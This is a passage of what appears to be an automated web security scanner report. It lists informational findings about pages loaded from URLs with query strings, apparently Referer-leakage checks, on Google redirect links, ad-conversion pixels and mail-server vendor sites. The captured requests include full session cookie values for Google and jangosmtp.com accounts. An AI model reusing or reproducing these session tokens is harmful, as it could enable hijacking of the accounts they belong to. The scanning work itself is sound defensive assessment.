GET /url?sa=t&source=web&cd=13&sqi=2&ved=0CMoBEBYwDA&url=http%3A%2F%2Fwww.aprelium.com%2Fabyssws%2F&ei=W3ZzTvaPGcfisQKX6dWLBQ&usg=AFQjCNFTLLZy51EpBVUwbIZJF-Fva9QsSg HTTP/1.1/search?sourceid=chrome&ie=UTF-8&q=smtp+server#pq=smtp+server&hl=en&sugexp=gsis%2Ci18n%3Dtrue&cp=2&gs_id=7&xhr=t&q=web+server&pf=p&sclient=psy-ab&source=hp&pbx=1&oq=we+server&aq=0c&aqi=g-c4&aql=&gs_sm=&gs_upl=&bav=on.2,or.r_gc.r_pw.&fp=b659e1e8b520709&biw=1147&bih=870/xhtml+xml,application/xml;q=0.9,*/*;q=0.8;q=0.3:U=f5d01e2b2ce2e5f3:TM=1314742576:LM=1314798155:S=dIZk57crg6QHX-5i; HSID=AbppJa1_E7iMausjK; APISID=qfB18aLM4wkSRyYX/Aqw8quAKRHd7UuSmT; SID=DQAAAO4AAAD7Xl0oDS_3Xy0JKwYeKgRjMbxp0c2W5DSFLy2Y9JkSJYmKvv1nBof0akZrOA6irTQl8KxP9Eoae06RbjzCClA25MRuVFdF6rXzUkh8SKGCxg1rw75hUuF-Q6Hfpq5C54hAzhRx-AmmtuoAFnzNK8zWfOVJpa_QelYHWpLFQHbnPZSoTt-oYFQ8FvrjsTQtOrrTGqDw6xFuT1mXvxsUuamUyR2icH4Fzc2kSrnlcFORO_n1bWSW0aN0HPNXtAVlbrIKfpZOlzJv9hO2NdES_xUtKqOl4j7gqJr7lekB4ZGb18ynomXsS5lHVunDhfYOlCo; NID=51=sK4D6Ekqiq5x2aIbfG65p0N2bY_ck2S7XMaUrDs_B5DJ1iJfkQNtuQI8wOg2lKG4sBjrjWXSg7pA0iwTqjrJ-gxxWdfY8fs1gpCmxlTKp0PssKiWQtHPYPS35cLQE0Df
Response
HTTP/1.1 302 Found/abyssws/;charset=utf-8">><A HREF="http://www.aprelium.com/abyssws/"> here</A>...[SNIP]...
15.64. http://www.google.com/url
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://www.google.com
Path:
/url
Issue detail
The page was loaded from a URL containing a query string:http://www.google.com/url?sa=t&source=web&cd=12&sqi=2&ved=0CMIBEBYwCw&url=http%3A%2F%2Funite.opera.com%2Fapplication%2F192%2F&ei=W3ZzTvaPGcfisQKX6dWLBQ&usg=AFQjCNEnOZIllr_lFQnf_fpJbTCoPV8HbA http://unite.opera.com/application/192/
Request
GET /url?sa=t&source=web&cd=12&sqi=2&ved=0CMIBEBYwCw&url=http%3A%2F%2Funite.opera.com%2Fapplication%2F192%2F&ei=W3ZzTvaPGcfisQKX6dWLBQ&usg=AFQjCNEnOZIllr_lFQnf_fpJbTCoPV8HbA HTTP/1.1/search?sourceid=chrome&ie=UTF-8&q=smtp+server#pq=smtp+server&hl=en&sugexp=gsis%2Ci18n%3Dtrue&cp=2&gs_id=7&xhr=t&q=web+server&pf=p&sclient=psy-ab&source=hp&pbx=1&oq=we+server&aq=0c&aqi=g-c4&aql=&gs_sm=&gs_upl=&bav=on.2,or.r_gc.r_pw.&fp=b659e1e8b520709&biw=1147&bih=870/xhtml+xml,application/xml;q=0.9,*/*;q=0.8;q=0.3:U=f5d01e2b2ce2e5f3:TM=1314742576:LM=1314798155:S=dIZk57crg6QHX-5i; HSID=AbppJa1_E7iMausjK; APISID=qfB18aLM4wkSRyYX/Aqw8quAKRHd7UuSmT; SID=DQAAAO4AAAD7Xl0oDS_3Xy0JKwYeKgRjMbxp0c2W5DSFLy2Y9JkSJYmKvv1nBof0akZrOA6irTQl8KxP9Eoae06RbjzCClA25MRuVFdF6rXzUkh8SKGCxg1rw75hUuF-Q6Hfpq5C54hAzhRx-AmmtuoAFnzNK8zWfOVJpa_QelYHWpLFQHbnPZSoTt-oYFQ8FvrjsTQtOrrTGqDw6xFuT1mXvxsUuamUyR2icH4Fzc2kSrnlcFORO_n1bWSW0aN0HPNXtAVlbrIKfpZOlzJv9hO2NdES_xUtKqOl4j7gqJr7lekB4ZGb18ynomXsS5lHVunDhfYOlCo; NID=51=sK4D6Ekqiq5x2aIbfG65p0N2bY_ck2S7XMaUrDs_B5DJ1iJfkQNtuQI8wOg2lKG4sBjrjWXSg7pA0iwTqjrJ-gxxWdfY8fs1gpCmxlTKp0PssKiWQtHPYPS35cLQE0Df
Response
HTTP/1.1 302 Found/application/192/;charset=utf-8">><A HREF="http://unite.opera.com/application/192/"> here</A>...[SNIP]...
15.65. http://www.google.com/url
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://www.google.com
Path:
/url
Issue detail
The page was loaded from a URL containing a query string:http://www.google.com/url?sa=t&source=web&cd=1&sqi=2&ved=0CDgQFjAA&url=http%3A%2F%2Fblog.teethremoval.com%2Fnote-on-malware-godaddy-shared-servers-compromised%2F&ei=fY5zTprQDYvRiALfuNS0Ag&usg=AFQjCNG6qlpXe0Ejp3TZy0lBB8NOjr5sSA http://blog.teethremoval.com/note-on-malware-godaddy-shared-servers-compromised/
Request
GET /url?sa=t&source=web&cd=1&sqi=2&ved=0CDgQFjAA&url=http%3A%2F%2Fblog.teethremoval.com%2Fnote-on-malware-godaddy-shared-servers-compromised%2F&ei=fY5zTprQDYvRiALfuNS0Ag&usg=AFQjCNG6qlpXe0Ejp3TZy0lBB8NOjr5sSA HTTP/1.1/search?sourceid=chrome&ie=UTF-8&q=godaddy+hack#sclient=psy-ab&hl=en&tbo=1&tbs=qdr:w&source=hp&q=godaddy%20malware%20attack&pbx=1&oq=&aq=&aqi=&aql=&gs_sm=&gs_upl=&tbo=1&fp=1&biw=1407&bih=1005&pf=p&pdl=500&bav=on.2,or.r_gc.r_pw.&cad=b/xhtml+xml,application/xml;q=0.9,*/*;q=0.8;q=0.3:U=f5d01e2b2ce2e5f3:TM=1314742576:LM=1314798155:S=dIZk57crg6QHX-5i; HSID=AbppJa1_E7iMausjK; APISID=qfB18aLM4wkSRyYX/Aqw8quAKRHd7UuSmT; NID=51=sK4D6Ekqiq5x2aIbfG65p0N2bY_ck2S7XMaUrDs_B5DJ1iJfkQNtuQI8wOg2lKG4sBjrjWXSg7pA0iwTqjrJ-gxxWdfY8fs1gpCmxlTKp0PssKiWQtHPYPS35cLQE0Df; SID=DQAAAO8AAAD7Xl0oDS_3Xy0JKwYeKgRjLggJuPZagSb_-dzKijS1WNMY9j-KLCCbIkdL5gFUKxj425Av1q5M48IS5j1lYOObs1zt7iBSUPDIs8jDHA7BNSVBwNR2nv_wfJPRoa5UYs7rUEP3-cdk3lbIVVG7eniEMusm6ux7K_9KyH7qPXchvacU1HerezJNMU_4wP5jYYqqnYQQmTLUmsqdiiIkvWpvD7gxzfPW2Y7ijG9aRGGBnwWnoSSqmkJqo5RS7cgEFhp_Lzt2RC_Uv98s0HAymWMstKwJjU4OCemwWpmfSMU83cZ-hazCj5scCqbY8o2nlC4
Response
HTTP/1.1 302 Found.com/note-on-malware-godaddy-shared-servers-compromised/;charset=utf-8">><A HREF="http://blog.teethremoval.com/note-on-malware-godaddy-shared-servers-compromised/"> here</A>...[SNIP]...
15.66. http://www.google.com/url
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://www.google.com
Path:
/url
Issue detail
The page was loaded from a URL containing a query string:http://www.google.com/url?sa=t&source=web&cd=3&sqi=2&ved=0CIwBEBYwAg&url=http%3A%2F%2Fhttpd.apache.org%2F&ei=W3ZzTvaPGcfisQKX6dWLBQ&usg=AFQjCNGyImC8Qi-rx_Bxd9knbUGKMxH5TQ
Request
GET /url?sa=t&source=web&cd=3&sqi=2&ved=0CIwBEBYwAg&url=http%3A%2F%2Fhttpd.apache.org%2F&ei=W3ZzTvaPGcfisQKX6dWLBQ&usg=AFQjCNGyImC8Qi-rx_Bxd9knbUGKMxH5TQ HTTP/1.1/search?sourceid=chrome&ie=UTF-8&q=smtp+server#pq=smtp+server&hl=en&sugexp=gsis%2Ci18n%3Dtrue&cp=2&gs_id=7&xhr=t&q=web+server&pf=p&sclient=psy-ab&source=hp&pbx=1&oq=we+server&aq=0c&aqi=g-c4&aql=&gs_sm=&gs_upl=&bav=on.2,or.r_gc.r_pw.&fp=b659e1e8b520709&biw=1147&bih=870/xhtml+xml,application/xml;q=0.9,*/*;q=0.8;q=0.3:U=f5d01e2b2ce2e5f3:TM=1314742576:LM=1314798155:S=dIZk57crg6QHX-5i; HSID=AbppJa1_E7iMausjK; APISID=qfB18aLM4wkSRyYX/Aqw8quAKRHd7UuSmT; SID=DQAAAO4AAAD7Xl0oDS_3Xy0JKwYeKgRjMbxp0c2W5DSFLy2Y9JkSJYmKvv1nBof0akZrOA6irTQl8KxP9Eoae06RbjzCClA25MRuVFdF6rXzUkh8SKGCxg1rw75hUuF-Q6Hfpq5C54hAzhRx-AmmtuoAFnzNK8zWfOVJpa_QelYHWpLFQHbnPZSoTt-oYFQ8FvrjsTQtOrrTGqDw6xFuT1mXvxsUuamUyR2icH4Fzc2kSrnlcFORO_n1bWSW0aN0HPNXtAVlbrIKfpZOlzJv9hO2NdES_xUtKqOl4j7gqJr7lekB4ZGb18ynomXsS5lHVunDhfYOlCo; NID=51=sK4D6Ekqiq5x2aIbfG65p0N2bY_ck2S7XMaUrDs_B5DJ1iJfkQNtuQI8wOg2lKG4sBjrjWXSg7pA0iwTqjrJ-gxxWdfY8fs1gpCmxlTKp0PssKiWQtHPYPS35cLQE0Df
Response
HTTP/1.1 302 Found;charset=utf-8">><A HREF="http://httpd.apache.org/"> here</A>...[SNIP]...
15.67. http://www.googleadservices.com/pagead/conversion/1036609180/
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://www.googleadservices.com
Path:
/pagead/conversion/1036609180/
Issue detail
The page was loaded from a URL containing a query string:http://www.googleadservices.com/pagead/conversion/1036609180/?random=1316204997440&cv=6&fst=1316204997419&num=4&fmt=1&value=0&label=y7DnCNTo-wEQnM2l7gM&bg=666666&hl=en&guid=ON&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_his=3&u_tz=-300&u_java=true&u_nplug=20&u_nmime=100&url=http%3A//www.blackbaud.com/ https://services.google.com/sitestats/en_US.html?cid=1036609180
Request
GET /pagead/conversion/1036609180/?random=1316204997440&cv=6&fst=1316204997419&num=4&fmt=1&value=0&label=y7DnCNTo-wEQnM2l7gM&bg=666666&hl=en&guid=ON&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_his=3&u_tz=-300&u_java=true&u_nplug=20&u_nmime=100&url=http%3A//www.blackbaud.com/ HTTP/1.1/getSegment.php?purl=http%3A%2F%2Fwww.blackbaud.com%2F&jsref=&rnd=1316204996203;q=0.3
Response
HTTP/1.1 302 Found.googleadservices.com/pagead/p3p.xml", CP="NOI DEV PSA PSD IVA PVD OTP OUR OTR IND OTC"services.com.doubleclick.net/pagead/viewthroughconversion/1036609180/?random=1316204997440&cv=6&fst=1316204997419&num=4&fmt=1&value=0&label=y7DnCNTo-wEQnM2l7gM&bg=666666&hl=en&guid=ON&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_his=3&u_tz=-300&u_java=true&u_nplug=20&u_nmime=100&url=http%3A//www.blackbaud.com/&ctc_id=CAIVAgAAAB0CAAAA&ct_cookie_present=true<font style="font-size:11px" face="arial,sans-serif" color="#FFFFFF">Google Site Stats - <a href="https://services.google.com/sitestats/en_US.html?cid=1036609180" target="_blank"> learn more</a>...[SNIP]...
15.68. http://www.googleadservices.com/pagead/conversion/1038104282/
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://www.googleadservices.com
Path:
/pagead/conversion/1038104282/
Issue detail
The page was loaded from a URL containing a query string:http://www.googleadservices.com/pagead/conversion/1038104282/?random=1316207962157&cv=6&fst=1316207962157&num=1&fmt=2&value=0&label=whv2CLb_mgIQ2u2A7wM&bg=ffffff&hl=en&guid=ON&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_his=2&u_tz=-300&u_java=true&u_nplug=20&u_nmime=100&ref=http%3A//unite.opera.com/application/192/&url=http%3A//www.opera.com/%3Fref%3Dhome https://services.google.com/sitestats/en_US.html?cid=1038104282
Request
GET /pagead/conversion/1038104282/?random=1316207962157&cv=6&fst=1316207962157&num=1&fmt=2&value=0&label=whv2CLb_mgIQ2u2A7wM&bg=ffffff&hl=en&guid=ON&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_his=2&u_tz=-300&u_java=true&u_nplug=20&u_nmime=100&ref=http%3A//unite.opera.com/application/192/&url=http%3A//www.opera.com/%3Fref%3Dhome HTTP/1.1=home/xhtml+xml,application/xml;q=0.9,*/*;q=0.8;q=0.3
Response
HTTP/1.1 302 Found.googleadservices.com/pagead/p3p.xml", CP="NOI DEV PSA PSD IVA PVD OTP OUR OTR IND OTC"services.com.doubleclick.net/pagead/viewthroughconversion/1038104282/?random=1316207962157&cv=6&fst=1316207962157&num=1&fmt=2&value=0&label=whv2CLb_mgIQ2u2A7wM&bg=ffffff&hl=en&guid=ON&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_his=2&u_tz=-300&u_java=true&u_nplug=20&u_nmime=100&ref=http%3A//unite.opera.com/application/192/&url=http%3A//www.opera.com/%3Fref%3Dhome&ctc_id=CAIVAgAAAB0CAAAA&ct_cookie_present=true<font style="font-size:11px" face="arial,sans...[SNIP]... <a href="https://services.google.com/sitestats/en_US.html?cid=1038104282" target="_blank"> learn more</a>...[SNIP]...
15.69. http://www.googleadservices.com/pagead/conversion/1071433059/
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://www.googleadservices.com
Path:
/pagead/conversion/1071433059/
Issue detail
The page was loaded from a URL containing a query string:http://www.googleadservices.com/pagead/conversion/1071433059/?random=1316205016181&cv=6&fst=1316205016181&num=1&fmt=1&value=1200&label=6N1uCOmL7QEQ44rz_gM&bg=ffffff&hl=en&guid=ON&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_his=7&u_tz=-300&u_java=true&u_nplug=20&u_nmime=100&ref=http%3A//www.port25.com/products/prod_eval.html&url=http%3A//www.port25.com/products/prod_evalthanks.html https://services.google.com/sitestats/en_US.html?cid=1071433059
Request
GET /pagead/conversion/1071433059/?random=1316205016181&cv=6&fst=1316205016181&num=1&fmt=1&value=1200&label=6N1uCOmL7QEQ44rz_gM&bg=ffffff&hl=en&guid=ON&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_his=7&u_tz=-300&u_java=true&u_nplug=20&u_nmime=100&ref=http%3A//www.port25.com/products/prod_eval.html&url=http%3A//www.port25.com/products/prod_evalthanks.html HTTP/1.1/products/prod_evalthanks.html/xhtml+xml,application/xml;q=0.9,*/*;q=0.8;q=0.329XcHpUdFMzSjZXemlBTHY0ZDMtRFBINGxfTUJrNXFrM3dxb3JOb09FQVFvQ0ZDTzc2X3BfX19fX184QllNa0dvQUhqaXZQLUE4Z0JBYW9FRjBfUWs1WjdxYTNJeDhIZU56TEkwZWotc1kwZ0F0N3ISEwi90Mr6iaKrAhUjgIMKHUYJZ9gYASCyuICCl-6xjH1IAQ
Response
HTTP/1.1 302 Found.googleadservices.com/pagead/p3p.xml", CP="NOI DEV PSA PSD IVA PVD OTP OUR OTR IND OTC"services.com.doubleclick.net/pagead/viewthroughconversion/1071433059/?random=1316205016181&cv=6&fst=1316205016181&num=1&fmt=1&value=1200&label=6N1uCOmL7QEQ44rz_gM&bg=ffffff&hl=en&guid=ON&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_his=7&u_tz=-300&u_java=true&u_nplug=20&u_nmime=100&ref=http%3A//www.port25.com/products/prod_eval.html&url=http%3A//www.port25.com/products/prod_evalthanks.html&ctc_id=CAEVAQAAAB0BAAAA&ct_cookie_present=true<font style="font-size:11px" face="arial,sans-serif" color="#000000">Google Site Stats - <a href="https://services.google.com/sitestats/en_US.html?cid=1071433059" target="_blank"> learn more</a>...[SNIP]...
15.70. http://www.googleadservices.com/pagead/conversion/1072356810/
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://www.googleadservices.com
Path:
/pagead/conversion/1072356810/
Issue detail
The page was loaded from a URL containing a query string:http://www.googleadservices.com/pagead/conversion/1072356810/?random=1316207703039&cv=6&fst=1316207703039&num=1&fmt=1&value=1&label=VwKaCN7ZUBDKu6v_Aw&bg=ffffff&hl=en&gl=US&guid=ON&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_his=6&u_tz=-300&u_java=true&u_nplug=20&u_nmime=100&ref=http%3A//www.altn.com/Downloads/&url=http%3A//www.altn.com/Downloads/FreeEvaluation/ https://services.google.com/sitestats/en_US.html?cid=1072356810
Request
GET /pagead/conversion/1072356810/?random=1316207703039&cv=6&fst=1316207703039&num=1&fmt=1&value=1&label=VwKaCN7ZUBDKu6v_Aw&bg=ffffff&hl=en&gl=US&guid=ON&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_his=6&u_tz=-300&u_java=true&u_nplug=20&u_nmime=100&ref=http%3A//www.altn.com/Downloads/&url=http%3A//www.altn.com/Downloads/FreeEvaluation/ HTTP/1.1/Downloads/FreeEvaluation//xhtml+xml,application/xml;q=0.9,*/*;q=0.8;q=0.3zVuM1Z6VHNIcks0dkdzUUtJeHMyQkNmaVpsS0FDMlB6bmtBZV9rYkVPRUFjb0NGQ1FtZXlMLWZfX19fOEJZTWtHb0FIS3U2dl9BOGdCQWFvRUlFX1Fmd2c2eW5NSkF1dGNVZTRZa2lIVkJaOXRseXZTNmJmcWRvTDdDU2IzEhMI0L3-upSiqwIV5RlCCh0ufyqKGAEg34mEjJS9iPx8SAE
Response
HTTP/1.1 302 Found.googleadservices.com/pagead/p3p.xml", CP="NOI DEV PSA PSD IVA PVD OTP OUR OTR IND OTC"services.com.doubleclick.net/pagead/viewthroughconversion/1072356810/?random=1316207703039&cv=6&fst=1316207703039&num=1&fmt=1&value=1&label=VwKaCN7ZUBDKu6v_Aw&bg=ffffff&hl=en&gl=US&guid=ON&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_his=6&u_tz=-300&u_java=true&u_nplug=20&u_nmime=100&ref=http%3A//www.altn.com/Downloads/&url=http%3A//www.altn.com/Downloads/FreeEvaluation/&ctc_id=CAEVAQAAAB0BAAAA&ct_cookie_present=true<font style="font-size:11px" face="arial,sans-serif" color="#000000">Google Site Stats - <a href="https://services.google.com/sitestats/en_US.html?cid=1072356810" target="_blank"> learn more</a>...[SNIP]...
15.71. http://www.imailserver.com/windows-email-server/
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://www.imailserver.com
Path:
/windows-email-server/
Issue detail
The page was loaded from a URL containing a query string:http://www.imailserver.com/windows-email-server/?k_id=imailserver_com_imail_internetmarketing_worldwide_googleadwords&gclid=cpnitvmjoqscfqhrgwodlzugzg http://feeds.feedburner.com/ImailServerBlog http://forums.ipswitch.com/Forum10-1.aspx http://image.providesupport.com/image/ipswitchimailserver.gif http://ipswitchmsg.force.com/kb/ http://s7.addthis.com/js/250/addthis_widget.js http://solariz.de/highslide-wordpress-reloaded http://www.facebook.com/imailserver http://www.ipswitch.com/copyright-trademark-notice/ http://www.linkedin.com/in/imailserver http://www.providesupport.com/?monitor=ipswitchimailserver http://www.twitter.com/imailserver http://www.youtube.com/user/IMailServer https://www.myipswitch.com/licensing/
Request
GET /windows-email-server/?k_id=imailserver_com_imail_internetmarketing_worldwide_googleadwords&gclid=cpnitvmjoqscfqhrgwodlzugzg HTTP/1.1/search?sourceid=chrome&ie=UTF-8&q=smtp+server/xhtml+xml,application/xml;q=0.9,*/*;q=0.8;q=0.3
Response
HTTP/1.1 200 OK.com/xmlrpc.php/xhtml1/DTD/xhtml1-transitional.dtd">/1999/xhtml" dir="ltr" lang="en-US" xml:lang="en...[SNIP]... ?100521" rel="stylesheet" type="text/css" media="print" /><link rel="alternate" type="application/rss+xml" title="Ipswitch IMail Server Blog Feed" href="http://feeds.feedburner.com/ImailServerBlog" /> </head>...[SNIP]... <a href="https://www.myipswitch.com/licensing/" target="_blank"> Customer Login</a>...[SNIP]... <a target="_blank" href="http://ipswitchmsg.force.com/kb/"> Knowledgebase</a>...[SNIP]... <a target="_blank" href="https://www.myipswitch.com/licensing/"> MyIpswitch Login</a>...[SNIP]... <a href="http://www.ipswitch.com/copyright-trademark-notice/" title="Copyright"> Copyright © 1994-2011, Ipswitch, Inc.</a>...[SNIP]... <a href="http://forums.ipswitch.com/Forum10-1.aspx" target="_blank" class="forum" title="User Forums"> </a><a href="http://www.twitter.com/imailserver" target="_blank" class="twitter" title="Twitter"> </a><a href="http://www.facebook.com/imailserver" target="_blank" class="facebook" title="Facebook"> </a><a href="http://www.youtube.com/user/IMailServer" target="_blank" class="youtube" title="YouTube"> </a><a href="http://www.linkedin.com/in/imailserver" target="_blank" class="linkedin" title="LinkedIn"> </a>...[SNIP]... <script type="text/javascript" src="//s7.addthis.com/js/250/addthis_widget.js#pubid=wp-4e736abb459699c9"> </script>...[SNIP]... <a href="http://solariz.de/highslide-wordpress-reloaded" title="Highslide for Wordpress Plugin" style="display:none"> Highslide for Wordpress Plugin</a>...[SNIP]... <a href="http://www.providesupport.com?monitor=ipswitchimailserver"> <img src="http://image.providesupport.com/image/ipswitchimailserver.gif" border="0"> </a>...[SNIP]...
15.72. http://www.jangosmtp.com/Free-Account.asp
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://www.jangosmtp.com
Path:
/Free-Account.asp
Issue detail
The page was loaded from a URL containing a query string:http://www.jangosmtp.com/Free-Account.asp?s=g&kw=SMTP%20server&gclid=CKGSi_aJoqsCFRdTgwod5zgZiw http://www.facebook.com/jangomail?sk=info http://www.googleadservices.com/pagead/conversion.js http://www.googleadservices.com/pagead/conversion/1072582907/?label=Rd-NCKX8gAIQ-6G5_wM&guid=ON&script=0 http://www.jangomail.com/ http://www.twitter.com/JangoSMTP http://www.youtube.com/jangosmtp https://secure.adnxs.com/seg?add=157247&t=2 https://www.jangomail.com/et/a.z?UID=4302
Request
GET /Free-Account.asp?s=g&kw=SMTP%20server&gclid=CKGSi_aJoqsCFRdTgwod5zgZiw HTTP/1.1/search?sourceid=chrome&ie=UTF-8&q=smtp+server/xhtml+xml,application/xml;q=0.9,*/*;q=0.8;q=0.3
Response
HTTP/1.1 200 OK+server&Search=g&Referrer=http%3A%2F%2Fwww%2Egoogle%2Ecom%2Fsearch%3Fsourceid%3Dchrome%26ie%3DUTF%2D8%26q%3Dsmtp%2Bserver; expires=Fri, 16-Dec-2011 16:26:44 GMT; path=//xhtml1/DTD/xhtml1-transitional.dtd">/1999/xhtml">...[SNIP]... <a href="http://www.twitter.com/JangoSMTP" rel="nofollow" target="_twitter"> <img src="/images/twitter.png" border="0" /></a> <a href="http://www.facebook.com/jangomail?sk=info#!/pages/JangoSMTP/183157681700340" rel="nofollow" target="_facebook"> <img src="/images/facebook.png" border="0" /></a><a href="http://www.youtube.com/jangosmtp" rel="nofollow" target="_youtube"> <img src="/common/images/youtube.png" border="0" />...[SNIP]... <a href="http://www.jangomail.com"> Need an email broadcast service? Use JangoMail for email marketing campaigns.</a>...[SNIP]... <img src="https://secure.adnxs.com/seg?add=157247&t=2" width="1" height="1" /> ...[SNIP]... <script type="text/javascript" src="http://www.googleadservices.com/pagead/conversion.js"> ...[SNIP]... <img height="1" width="1" style="border-style:none;" alt="" src="http://www.googleadservices.com/pagead/conversion/1072582907/?label=Rd-NCKX8gAIQ-6G5_wM&guid=ON&script=0"/> <img src="https://www.jangomail.com/et/a.z?UID=4302"> ...[SNIP]...
15.73. https://www.jangosmtp.com/PasswordReset.asp
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
https://www.jangosmtp.com
Path:
/PasswordReset.asp
Issue detail
The page was loaded from a URL containing a query string:https://www.jangosmtp.com/PasswordReset.asp?status=BothBlank https://secure.adnxs.com/seg?add=157247&t=2 https://www.jangomail.com/et/a.z?UID=4302
Request
GET /PasswordReset.asp?status=BothBlank HTTP/1.1/PasswordReset.asp/xhtml+xml,application/xml;q=0.9,*/*;q=0.8;q=0.3=PLBPJOABDACEOGJJFNFHKHNJ; __utma=213119631.1093174196.1316204842.1316204842.1316204842.1; __utmb=213119631.5.10.1316204842; __utmc=213119631; __utmz=213119631.1316204842.1.1.utmgclid=CKGSi_aJoqsCFRdTgwod5zgZiw|utmccn=(not%20set)|utmcmd=(not%20set)|utmctr=smtp%20server; _chartbeat2=vs5g6yeo9lxk52er.1316204846394; ASPSESSIONIDSCTWBTQQ=DJNPJOABFNFKEADPKMALIIHA; JangoMail=Referrer=http%3A%2F%2Fwww%2Ejangosmtp%2Ecom%2Flogin%2Easp&Search=g&Word=SMTP+server
Response
HTTP/1.1 200 OK/xhtml1/DTD/xhtml1-transitional.dtd">/1999/xhtml">...[SNIP]... <img src="https://secure.adnxs.com/seg?add=157247&t=2" width="1" height="1" /> ...[SNIP]... <img src="https://www.jangomail.com/et/a.z?UID=4302"> ...[SNIP]...
15.74. https://www.jangosmtp.com/login.asp
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
https://www.jangosmtp.com
Path:
/login.asp
Issue detail
The page was loaded from a URL containing a query string:https://www.jangosmtp.com/login.asp?status=failed https://secure.adnxs.com/seg?add=157247&t=2 https://www.jangomail.com/et/a.z?UID=4302
Request
GET /login.asp?status=failed HTTP/1.1/login.asp/xhtml+xml,application/xml;q=0.9,*/*;q=0.8;q=0.3+server&Referrer=http%3A%2F%2Fwww%2Egoogle%2Ecom%2Fsearch%3Fsourceid%3Dchrome%26ie%3DUTF%2D8%26q%3Dsmtp%2Bserver&Search=g; ASPSESSIONIDSCTSBTQQ=PLBPJOABDACEOGJJFNFHKHNJ; __utma=213119631.1093174196.1316204842.1316204842.1316204842.1; __utmb=213119631.5.10.1316204842; __utmc=213119631; __utmz=213119631.1316204842.1.1.utmgclid=CKGSi_aJoqsCFRdTgwod5zgZiw|utmccn=(not%20set)|utmcmd=(not%20set)|utmctr=smtp%20server; _chartbeat2=vs5g6yeo9lxk52er.1316204846394; ASPSESSIONIDSCTWBTQQ=DJNPJOABFNFKEADPKMALIIHA
Response
HTTP/1.1 200 OK+server&Referrer=http%3A%2F%2Fwww%2Ejangosmtp%2Ecom%2Flogin%2Easp&Search=g; expires=Fri, 16-Dec-2011 16:30:42 GMT; path=//xhtml1/DTD/xhtml1-transitional.dtd">/1999/xhtml">...[SNIP]... <img src="https://secure.adnxs.com/seg?add=157247&t=2" width="1" height="1" /> ...[SNIP]... <img src="https://www.jangomail.com/et/a.z?UID=4302"> ...[SNIP]...
15.75. http://www.opera.com/
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://www.opera.com
Path:
/
Issue detail
The page was loaded from a URL containing a query string:http://www.opera.com/?ref=home http://ajax.googleapis.com/ajax/libs/jquery/1.4.2/jquery.min.js http://twitter.com/opera http://www.facebook.com/Opera http://www.googleadservices.com/pagead/conversion.js http://www.googleadservices.com/pagead/conversion/1038104282/?label=whv2CLb_mgIQ2u2A7wM&guid=ON&script=0 http://www.youtube.com/user/operasoftware http://www.youtube.com/watch?v=CD0IwRSpMSs&width=800&height=480 http://www.youtube.com/watch?v=JuadsZwWBIg&width=800&height=480
Request
GET /?ref=home HTTP/1.1/application/192//xhtml+xml,application/xml;q=0.9,*/*;q=0.8;q=0.3
Response
HTTP/1.1 200 OK/xhtml1/DTD/xhtml1-strict.dtd">/1999/xhtml" lang="en" xml:lang="en">...[SNIP]... <script src="http://ajax.googleapis.com/ajax/libs/jquery/1.4.2/jquery.min.js" type="text/javascript"> </script>...[SNIP]... <a href="http://www.youtube.com/watch?v=JuadsZwWBIg&width=800&height=480" rel="prettyPhoto"> Watch video</a>...[SNIP]... <a href="http://www.youtube.com/watch?v=CD0IwRSpMSs&width=800&height=480" rel="prettyPhoto"> Watch video</a>...[SNIP]... <a id="opera-youtube" href="http://www.youtube.com/user/operasoftware"> </a></li><li><a id="opera-facebook" href="http://www.facebook.com/Opera"> </a></li><li><a id="opera-twitter" href="http://twitter.com/opera"> </a>...[SNIP]... <script type="text/javascript" src="http://www.googleadservices.com/pagead/conversion.js"> </script><noscript><img height="1" width="1" alt="" src="http://www.googleadservices.com/pagead/conversion/1038104282/?label=whv2CLb_mgIQ2u2A7wM&guid=ON&script=0" /> </noscript>...[SNIP]...
15.76. http://www.powermta.port25.com/smtp-server-software-2/
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://www.powermta.port25.com
Path:
/smtp-server-software-2/
Issue detail
The page was loaded from a URL containing a query string:http://www.powermta.port25.com/smtp-server-software-2/?gclid=CL3QyvqJoqsCFSOAgwodRgln2A http://connect.facebook.net/en_US/all.js http://platform.twitter.com/widgets.js http://powermta1.com/wp-content/plugins/cforms/js/cforms.js http://powermta1.com/wp-content/plugins/cforms/styling/sidebar-layout.css http://twitter.com/Port25Solutions http://twitter.com/fletchster http://twitter.com/tabsharani http://www.emailexperience.org/ http://www.espcoalition.org/ http://www.facebook.com/pages/Port25-Solutions-Inc/40433056905 http://www.linkedin.com/groups?about=&gid=1886901&trk=anet_ug_grppro http://www.maawg.org/ http://www.the-dma.org/ http://www.twitter.com/tabsharani
Request
GET /smtp-server-software-2/?gclid=CL3QyvqJoqsCFSOAgwodRgln2A HTTP/1.1/search?sourceid=chrome&ie=UTF-8&q=smtp+server/xhtml+xml,application/xml;q=0.9,*/*;q=0.8;q=0.3
Response
